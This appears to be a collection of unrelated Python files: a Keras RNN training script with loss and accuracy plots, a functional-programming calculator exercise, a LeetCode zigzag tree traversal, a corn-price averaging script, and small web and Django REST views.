model = keras.models.Sequential()
# Add a Masking layer (skips timesteps that are all mask_value)
model.add(layers.Masking(mask_value=0.0, input_shape=(2, 2)))
# Add an RNN layer
rnn_layer =layers.SimpleRNN(50, return_sequences=False)
model.add(rnn_layer)
#model.add(Bidirectional(LSTM(32)))
model.add(Dense(200, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(100, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(30,activation='relu'))
# multi-label output variant
#model.add(Dense(10, activation='sigmoid'))
# single-label output
model.add(Dense(1, activation='sigmoid'))
adam = keras.optimizers.Adam(lr=0.01, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)#binary_focal_loss(gamma=2, alpha=0.25)
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['binary_accuracy']) ###,'top_k_categorical_accuracy'])#metrics.hanming_loss
model.summary()#####loss_function.multilabel_categorical_crossentropy
history = model.fit(x_train,y_train,batch_size=8, epochs=20,validation_data=(x_test,y_test))
print(model.predict(x_test[0:10]))
print(y_test[0:10])
'''# 绘制训练 & 验证的损失值和准确率(统一画图)
plt.plot(history.history['binary_accuracy'])
plt.plot(history.history['val_binary_accuracy'])
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model accuracy and loss')
plt.ylabel('Accuracy and Loss')
plt.xlabel('Epoch')
plt.legend(['train_acc', 'test_acc','train_loss','test_loss'], loc='upper left')
plt.show()'''
# Plot training and test curves as separate figures
# Plot training loss
plt.plot(history.history['loss'])
plt.ylabel('test_loss_Value')
plt.xlabel('Epoch')
plt.title('Model training')
plt.legend(['test_loss'],loc = 'upper left')
plt.savefig('./train_loss.jpg')
plt.show()
plt.plot(history.history['binary_accuracy'])
plt.ylabel('test_accuracy_Value')
plt.xlabel('Epoch')
plt.title('Model training')
plt.legend(['test_accuracy'],loc = 'upper left')
plt.savefig('./train_accuracy.jpg')
plt.show()
# Plot test (validation) accuracy and loss
plt.plot(history.history['val_binary_accuracy'])
plt.ylabel('test_accuracy_Value')
plt.xlabel('Epoch')
plt.title('Model testing')
plt.legend(['test_accuracy'],loc = 'upper left')
plt.savefig('./test_accuracy.jpg')
plt.show()
plt.plot(history.history['val_loss'])
plt.ylabel('test_loss_Value')
plt.xlabel('Epoch')
plt.title('Model testing')
plt.legend(['test_loss'],loc = 'upper left')
plt.savefig('./test_loss.jpg')
plt.show()
# 绘制测试损失值和评估
'''plt.plot(history.history['val_loss'])
plt.plot(history.history['val_binary_accuracy'])
plt.title('Model testing')
plt.ylabel('Value')
plt.xlabel('Epoch')
plt.legend(['test_loss', 'test_evaluate'], loc='upper left')
plt.show()'''
#绘制模型图
#plot_model(model, to_file='model.png')
#查看权重
'''U=model.get_weights()[0] #输入层和循环层之间的权重,维度为(20*32)
W=model.get_weights()[1] #循环层与循环层之间的权重,维度为(32*32)
bias=model.get_weights()[2] #隐藏层的偏置项,32个
print(U)
print(W)
print(bias)'''
'''acc = history.history['binary_accuracy']
loss = history.history['loss']
epochs = range(1, len(acc) + 1)
plt.title('Accuracy and Loss')
plt.plot(epochs, acc, 'red', label='Training acc')
plt.plot(epochs, loss, 'blue', label='Validation loss')
plt.legend()
plt.show()'''
|
##########################################
# Calculator Functions
##########################################
# Function1: add two lists together using Lambda and Map
# each element of list1 will be added to the corresponding element of list2
def add_lists(list1, list2):
    return map(lambda a, b: a + b, list1, list2)
# Function2: subtract two lists using Lambda and Map
# each element of list2 will be subtracted from the corresponding element of list1
def subtract_lists(list1, list2):
    return map(lambda a, b: a - b, list1, list2)
# Function3: divide two lists using Lambda and Map
# each element of list1 will be divided by the corresponding element of list2
# (division by zero yields the string 'nan' instead of raising)
def divide_lists(list1,list2):
    return map(lambda num, den: num / float(den) if den != 0 else 'nan', list1, list2)
# Function4a: calculator function to multiply two numbers
def multiply(first, second):
    """Multiply two numbers; return 'error' if either operand is not numeric."""
    # `long` only exists on Python 2; fall back to the Python 3 numeric types
    # so this also works on Python 3.
    try:
        number_types = (int, long, float, complex)
    except NameError:
        number_types = (int, float, complex)
    if isinstance(first, number_types) and isinstance(second, number_types):
        return first * second
    else:
        return 'error'
# Function4b: Adapt the above function to work with lists using Map
# each element of list1 will be multiplied by the corresponding element of list2
def multiply_list(list1, list2):
    return map(multiply, list1, list2)
# Function5: get the total of a list using Reduce
# every element of the list will be summed to get an overall total
def list_total(mylist):
    # functools.reduce exists on Python 2.6+ and Python 3 (where the `reduce`
    # builtin was removed), so import it for forward compatibility.
    from functools import reduce
    return reduce(lambda x, y: x+y, mylist)
# Function6: return the positive values in a list using Filter
# (zero is not considered positive)
def get_positive_vals(mylist):
    return filter(lambda value: value > 0, mylist)
# Function7: return a list of squares using List Comprehension
def get_squares(mylist):
    return [value ** 2 for value in mylist]
# Function8: return a list of leap years using List Comprehension
# a leap year is identified as one that either divides evenly by 400
# OR it divides evenly by 4 but not by 100
def get_leapyears(mylist):
    return [year for year in mylist
            if year % 400 == 0 or (year % 4 == 0 and year % 100 != 0)]
# Function9: generator to return a list of leap years given a start & end year
# (both endpoints inclusive)
# a leap year is identified as one that either divides evenly by 400
# OR it divides evenly by 4 but not by 100
def generate_leapyears(start, end):
    year = start
    while year <= end:
        if year % 400 == 0 or (year % 4 == 0 and year % 100 != 0):
            yield year
        year += 1
# Function10: generate a list of squares given a list of numbers
def generate_squares(mylist):
    for value in mylist:
        yield value ** 2
##########################################
# Calls
##########################################
# NOTE: Python 2 print statements; trailing commas below print the items on
# one line separated by spaces.
print add_lists([2,5,4],[2,3,0])
print subtract_lists([2,5,4,3],[2,3,0,4])
print divide_lists([1,2,3],[2,1,0])
print multiply_list([2,5,4,3],[2,3,0,4])
# Mixed types: the non-numeric element produces 'error' in the result list.
print multiply_list([2,5,4,3],['mary',3,0,4])
print list_total([2,5,4,3,-6,999])
print list_total(range(1,101))
print get_positive_vals([-10,-66,999,0,2])
print get_squares([2,5,4,-2])
print get_leapyears([1600,1700,1800,1900,2000, 1992])
leaps = generate_leapyears(1900,2000)
for year in leaps:
    print year,
print
squares = generate_squares(range(1,100))
for num in squares:
    print num,
|
#! /usr/bin/env python
# coding: utf-8
# 请实现一个函数按照之字形顺序打印二叉树,即第一行按照从左到右的顺序打印,第二层按照从右到左的顺序打印,第三行再按照从左到右的顺序打印,其他行以此类推。
#
#
#
# 例如:
# 给定二叉树: [3,9,20,null,null,15,7],
#
# 3
# / \
# 9 20
# / \
# 15 7
#
#
# 返回其层次遍历结果:
#
# [
# [3],
# [20,9],
# [15,7]
# ]
#
#
#
#
# 提示:
#
#
# 节点总数 <= 1000
#
# Related Topics 树 广度优先搜索
# 👍 91 👎 0
# leetcode submit region begin(Prohibit modification and deletion)
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    """Zigzag (spiral) level-order traversal of a binary tree.

    Level 0 is reported left-to-right, level 1 right-to-left, and so on.
    """

    def levelOrder(self, root):
        """
        :type root: TreeNode
        :rtype: List[List[int]]
        """
        if not root:
            return []
        # deque gives O(1) popleft; the original list.pop(0) is O(n) per
        # pop, making the whole traversal O(n^2). Local import keeps the
        # method self-contained.
        from collections import deque
        queue = deque([root])
        result = []
        left_to_right = True
        while queue:
            level = []
            # Snapshot the current level's size so children enqueued below
            # are processed in the next iteration.
            for _ in range(len(queue)):
                node = queue.popleft()
                level.append(node.val)
                if node.left:
                    queue.append(node.left)
                if node.right:
                    queue.append(node.right)
            # Reverse odd levels here instead of a second post-processing
            # pass over the finished result.
            result.append(level if left_to_right else level[::-1])
            left_to_right = not left_to_right
        return result
# leetcode submit region end(Prohibit modification and deletion)
|
import pandas as pd
import numpy as np
import plotly.graph_objects as go

# Monthly price data flattened to 30 rows x 12 columns.
# NOTE(review): assumes the sheet yields exactly 360 values -- confirm.
df = pd.read_excel('corn.xlsx', index_col=0)
data = df.to_numpy().reshape(30, 12)

# Express every month as an offset from the first month of its row.
# Vectorized broadcast replaces the original O(rows*cols) Python loop;
# data[:, :1] keeps a (30, 1) column so it broadcasts across all 12 months.
data_new = data - data[:, :1]

# Average the per-row offsets for each month across all 30 rows.
month_avg = np.average(data_new, axis=0)
print(month_avg)

fig = go.Figure(data=go.Scatter(x=np.arange(12), y=month_avg))
fig.show()
|
from flack.request import Request
from flack.response import Response
from flack.view import View
class Index(View):
    """Render the site home page."""

    def get(self, request: Request, *args, **kwargs):
        # Template context for home.html; self.engine is the template
        # engine supplied by the View base class.
        context = {'name': 'home'}
        html = self.engine.render('home.html', context=context)
        headers = {'Content-Type': 'text/html; charset=utf-8'}
        return Response(body=html, headers=headers)
class Blog(View):
    """Blog view: show a post selected by ?id=..., or a placeholder."""

    def get(self, request: Request, *args, **kwargs):
        post_id = request.GET.get('id', '')
        if post_id:
            # NOTE(review): presumably GET values are lists (one entry per
            # occurrence of the query parameter) and only the first is
            # wanted -- confirm against flack's Request implementation.
            return Response(body=post_id[0])
        return Response(body='This is blog')
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from rest_framework import generics
from .serializers import BucketlistSerializer
from .models import Bucketlist
#ListCreateAPIView is a generic view which provides GET (list all) and POST method handler
class CreateView(generics.ListCreateAPIView):
    """List all bucketlists (GET) and create new ones (POST)."""
    # Expose every Bucketlist row; DRF handles serialization via the
    # serializer class below.
    queryset = Bucketlist.objects.all()
    serializer_class = BucketlistSerializer
    def perform_create(self, serializer):
        """Persist the validated data when a new bucketlist is POSTed."""
        serializer.save()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.